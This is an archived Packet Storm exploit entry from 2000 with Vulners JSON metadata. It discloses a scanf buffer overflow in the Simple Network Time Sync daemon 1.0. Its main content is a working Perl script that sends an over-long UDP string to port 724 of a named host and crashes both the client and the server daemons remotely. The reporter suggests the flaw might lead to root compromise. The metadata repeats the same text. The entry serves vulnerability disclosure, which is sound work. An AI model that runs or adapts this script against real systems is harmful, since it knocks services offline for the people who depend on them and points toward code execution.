Search...

kill_sntsd.pl

2000-06-01T00:00:00

ID PACKETSTORM:22006
Type packetstorm
Reporter Ben Taylor
Modified 2000-06-01T00:00:00

Description

                                        
                                            `I noticed an uncommon scanf overflow in the Simple Network Time Sync daemon   
and client version 1.0, tested on Redhat 6.1. I haven't looked into this   
fully yet, but it looks as tho it could be root comprimising as it sits on a   
priveledged udp port and seems to coredump, but looks like it only gives you   
50 chars to run code with. I have included some perl here which will crash   
it remotely by sending it a string over 50 chars.  
  
---------------------------------------  
  
#!/usr/bin/perl -w  
#  
# Usage: ./kill_sntsd &lt;hostname&gt;  
#  
  
use Socket;  
  
send_packet(); # Needs to send 2 packets to kill the client and the server   
daemons  
send_packet();  
  
sub send_packet {  
  
$proto = getprotobyname('udp');  
$localaddr = gethostbyname("localhost") || die "error: $!\n";  
$iaddr = gethostbyname($ARGV[0]) || die "$!\n";  
$sin = sockaddr_in(724, $iaddr);  
$paddr = sockaddr_in(53, $localaddr);  
socket(SH, PF_INET, SOCK_DGRAM, $proto);  
bind(SH, $paddr);  
  
$|=1;  
  
connect(SH, $sin) || die "$!\n";  
  
# A string longer than 50 characters...  
print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";  
close(SH);  
  
}  
  
---------------------------------------  
  
logistix  
________________________________________________________________________  
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com  
  
`

JSON Vulners Source

Initial Source

{"edition": 1, "title": "kill_sntsd.pl", "bulletinFamily": "exploit", "published": "2000-06-01T00:00:00", "lastseen": "2016-11-03T10:29:20", "history": [], "modified": "2000-06-01T00:00:00", "reporter": "Ben Taylor", "hash": "0f2f89a57c17a23e2834ffae712b84fd3c80e7d0a94b054544afcb9994d40391", "sourceHref": "https://packetstormsecurity.com/files/download/22006/kill_sntsd.pl", "viewCount": 0, "href": "https://packetstormsecurity.com/files/22006/kill_sntsd.pl.html", "description": "", "type": "packetstorm", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "927555b218bac43f192a6ce4c8d58474"}, {"key": "modified", "hash": "8bb559cf3b9a79bcf1070ef448560072"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "8bb559cf3b9a79bcf1070ef448560072"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "810941d6c213dbc2c1e6c6a6c3fd8c85"}, {"key": "sourceData", "hash": "4c91e565e990960c6f7d1b617abfe36a"}, {"key": "sourceHref", "hash": "18ea8151257f3daa731dda710fcf5a13"}, {"key": "title", "hash": "08813d81dd68b4e8a819cdc9079d20c2"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "references": [], "objectVersion": "1.2", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "sourceData": "`I noticed an uncommon scanf overflow in the Simple Network Time Sync daemon \nand client version 1.0, tested on Redhat 6.1. I haven't looked into this \nfully yet, but it looks as tho it could be root comprimising as it sits on a \npriveledged udp port and seems to coredump, but looks like it only gives you \n50 chars to run code with. I have included some perl here which will crash \nit remotely by sending it a string over 50 chars. \n \n--------------------------------------- \n \n#!/usr/bin/perl -w \n# \n# Usage: ./kill_sntsd <hostname> \n# \n \nuse Socket; \n \nsend_packet(); # Needs to send 2 packets to kill the client and the server \ndaemons \nsend_packet(); \n \nsub send_packet { \n \n$proto = getprotobyname('udp'); \n$localaddr = gethostbyname(\"localhost\") || die \"error: $!\\n\"; \n$iaddr = gethostbyname($ARGV[0]) || die \"$!\\n\"; \n$sin = sockaddr_in(724, $iaddr); \n$paddr = sockaddr_in(53, $localaddr); \nsocket(SH, PF_INET, SOCK_DGRAM, $proto); \nbind(SH, $paddr); \n \n$|=1; \n \nconnect(SH, $sin) || die \"$!\\n\"; \n \n# A string longer than 50 characters... \nprint SH \"logistixlogistixlogistixlogistixlogistixlogistixlogistix\\n\"; \nclose(SH); \n \n} \n \n--------------------------------------- \n \nlogistix \n________________________________________________________________________ \nGet Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com \n \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "cvelist": [], "id": "PACKETSTORM:22006"}